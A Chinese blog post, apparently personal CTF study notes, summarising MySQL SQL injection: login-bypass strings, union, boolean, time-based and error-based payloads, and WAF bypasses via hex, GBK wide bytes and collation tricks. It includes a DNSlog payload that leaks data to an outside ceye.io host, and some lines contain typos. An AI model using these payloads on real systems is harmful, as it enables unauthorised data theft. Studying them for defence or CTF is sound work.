sql注入总结(一)--2018自我整理

SQL注入总结

前言：

本文和之后的总结都是进行总结，详细实现过程细节可能不会写出来~

所有sql语句均是mysql数据库的，其他数据库可能有些函数不同，但是方法大致相同

0x00 SQL注入原理：

SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中。

可能存在注入的地方有：登陆页面，搜索，获取HTTP头的信息(client-ip , x-forward-of)，订单处理（二次注入）等

注入的参数类型：POST, GET, COOKIES, SERVER 其实只要值传到数据库的执行语句那么就可能存在sql注入。

注入方法：union联合查询，延迟注入，布尔型回显判断注入，将内容输出到DNSlog

0x01 SQL注意一般方法：

正常查询语句如下

mysql_query(" select username,age from userinfo where id='$_GET['id']' ");

万能密码

' or '1'='1　　　　　　　　//完整语句 select username,age from userinfo where id='' or '1'='1'
' or 1=1#　　　　　　　　　//完整语句 select username,age from userinfo where id='' or 1=1#'
'=0#　　　　　　　　　　　　//完整语句 select username,age from userinfo where id=''=0#

使用union进行联合查询

xx' union select 1,(select database()) #
xx' union select (select database()),2 or '　　　　　　//这里如果把查询语句放到2的位置上，因为or的关系会不能显示正常查询的内容 

这个结果是在输出列为我们可控的 database()和'2'这2个值，那么如果登录页面的验证逻辑是如下形式

$result = mysql_query(" select username,password from userinfo where id='$_GET['username']' ");
if(md5($_GET['password']) === $result['password']){
　　echo "登录成功";
}
else{
　　echo "登录失败";
}

我们便可以通过下来方法构造来绕过用户名和密码

账户：xx' union select 1,'c81e728d9d4c2f636f067f89cc14862c' #　　　　　　//c81e728d9d4c2f636f067f89cc14862c是2的md5值
密码：2

使用bool回显判断注入

substr(str,start,long)

　　str是待切分的字符串，start是切分起始位置(下标从1开始)，long是切分长度

if(exp1,exp2,exp3)

　　如果满足exp1,那么执行exp2,否则执行exp3

注入语句

xx' or if((substr((select database()),1,1)='c'),1,0) #　　　　//判断数据库第一个字符是否为c

那么查询第二个字符可以用下列方法

xx' or if((substr((select database()),1,2)='ct'),1,0) #　　　　

xx' or if((substr((select database()),2,1)='t'),1,0) #　　　　

假设 , (逗号)被过滤了，可以用如下方式处理

　if(exp1, exp2, exp3) => case when exp1 then exp2 else exp3 end

　substr(exp1, 1, 1) => substr(exp1) from 1 for 1

xx' or case when (substr((select database()) from 1 for 1)='c') then 1 else 0 end #

假设substr被过滤了，可以用如下方式处理

LOCATE(substr,str,pos)

　　返回子串 substr 在字符串 str 中的第 pos 位置后第一次出现的位置。如果 substr 不在 str 中返回 0

　　ps：因为mysql对大小写不敏感，所有写的时候用 locate(binary'S', str, 1) 加个binary即可

xx' or if((locate(binary'c',(select database()),1)=1),1,0) #

xx' or if((locate(binary't',(select database()),1)=2),1,0) #

使用延迟注入

在输入无论正确的sql语句还是错误的sql语句页面都一样的情况下可以使用该方法进行判断是否成功

延时注入的本质是执行成功后延时几秒后再回显，反之不会延时直接回显

还是利用if来判断结果正确与否，只是返回值用延时来代替1

方法：sleep，benchmark， 笛卡尔积等（其他的我还是太菜不太会用）

基于sleep的延迟 
xx' or if(length((select database()))>1,sleep(5),1) #

基于笛卡尔乘积运算时间造成的时间延迟
xx' or if(length((select database()))>1,(select count(*) FROM information_schema.columns A,information_schema.columns p B,information_schema.columns C),1) # 

基于benchmark的延迟 
xx'or if(length((select database()))>1,(select BENCHMARK(10000000,md5('a'))),1) #--大概会用2S时间

benchmark和笛卡尔积的原理实质上是运算时间过长导致的延迟

使用DNSlog进行数据回显

原理网上很多文章都有，这里稍微总结下使用技巧

load_file()

　　读取文件并返回文件内容为字符串。

这里先在ceye.io上注册个账号看看自己的子域名就行

xx'or if(length((select database()))>1,(select load_file(concat('\\\\',(select database()),'.你账号的子域名.ceye.io\\a'))),1) # 

只要能够写select的地方，并且能够调用load_file函数就能执行

报错注入

报错注入前提是在后端代码有Exception这种异常处理的回显才能在web中用，不然即使能报错但是你不知道报错内容

报错注入函数很多，这里就介绍两种

xx' and (updatexml(1,concat(1,(select database()),1),1))　　　　# 用 or连接也行
xx' and (extractvalue(1,concat(1,(select database()),1)))　　　# 用 or连接也行

0x02 SQL注入的技巧:

该小结的例句还是以0x01节的原始查询语句相同

mid切割字符串

常常会出现回显字符串长度的限制，我们可以用mid来切割

mid(str, start[, length])

　　str为待切割的字符串，start为从第几个位置开始,length(没有则返回后面所有)为切割长度

xxx' union select (mid((select database()),1,2))

在写到这时，发现mid和substr作用很像，自己测试也一下可以在有时"代替"substr进行bool型判断

xx' or if(mid((select database()),2,1)='t',1,0) #

hex编码与字符串

字符串在某种意义上是和它的hex值等价的，举个栗子

select * from admin where id = '1'    <===>  select * from admin where id = 0x31

在"好不容易"逃逸第一个 '(单引号)后，后面的有会有查询关键字需要单引号会破坏sql语句结构时候用

或者一些关键字被过滤了，但是又会出现在查询里面

能够被hex编码的内容必须是字符串，即'(被单引号括起来)'的内容。关键字是不能被编码的

利用group_concat连接多行

有些时候返回值只能显示一行内容，这时候有2种办法

用limit一行一行的运行

用group_concat将内容连在一行一并输出

可见group_concat比limit要方便一点，使用方法

xx' union select 1,2,(select group_concat(name，id) from admin) #

它输出格式是每个元组用逗号隔开的(我这里email是我在做其他测试时候瞎填的)

利用like和regexp来进行匹配

like后面能进行模糊匹配，关键字内容为

%　　　　=> 匹配任意个字符串

_　　　　 => 匹配一个字符

但是存在前提，被匹配的字符可以是select查询语句，可以是该表内的字段，可以是返回为字符串的函数比如database()

xx' or database() like 'c%' #
xx' or database() like 'ct_' #
xx' or name like 'siji%' #
xx' or (select dd from uesrinfo) like 'h%' #

在某种程度上regexp和like的效果差不多，但是它是支持正则表达式

xx' or database() like '^c.f$' #

但是这样不方便，测试一下后发现可以用这个方法逐个匹配

xx' or name regexp '^s$*'

xx' or name regexp '^si$*'

mysql的GBK导致的宽字节注入

因为gbk是2个字节为一个编码，而我们如果把字符用url编码后%xx是一个字节，%xx%xx才表示一个gbk编码。在post或者get传参的时候会自动进行一次url解码

常见的过滤为addslashes(str)会把 ' 转义为 \' 导致注入失败

那么在宽字节注入的时候

xx' union select 1,2,database() # 　　　　//是会被拦截的
xx%df' union select 1,2,datbase() #　　　 //款字节注入，会把\'组合在一起

这个是还没进数据库前的样子，因为web页面解析用的gbk所以达到了这个效果。而实际进入数据库是这样的，看看日志(该文件编码是utf-8)

将文件用gbk编码形式打开

无论设置没有设置gbk传进去的字符样子没啥变化，但是内部处理机制发生了变化。总而言之gbk把 β\ 当成一个字符，而不是gbk模式下 β \ 是被当成2个字符

mysql关于utf-8编码问题

如果数据库是utf-8编码的情况下，常常会在PHP代码层用无视大小写的字母waf，那么utf-8的

是无法像GBK用宽字节绕过 ' ，但是在数据库中utf-8分为2种校对模式

utf8_unicode_ci

该模式会把特殊字母转换成2个正规英文，例如ß=ss

utf8_general_ci

该模式会把特殊字符转换成1个正规英文，例如Ä = A，Ö = O，Ü = U

比如是utf8_general_ci模式，下面是$sql1会被拦截，而$sql2不会被拦截

$sql1 = select * from admin where id = 'xx' union select 1,2,database() #
$sql2 = select * from admin where id = 'xx' uniÖn select 1,2,database() #
if(preg_match('/union/i',$sql1) > 0){
　　echo 'waf';
}
else{
　　执行sql语句
}

if(preg_match('/union/i',$sql2) > 0){
　　echo 'waf';
}
else{
　　执行sql语句
}

 

0xff结语：

这章就先把基础的和ctf中遇到的姿势写了写，sql注入还会写关于二次注入，简要的python脚本心得和点bypass总结

下篇sql注入总结(二)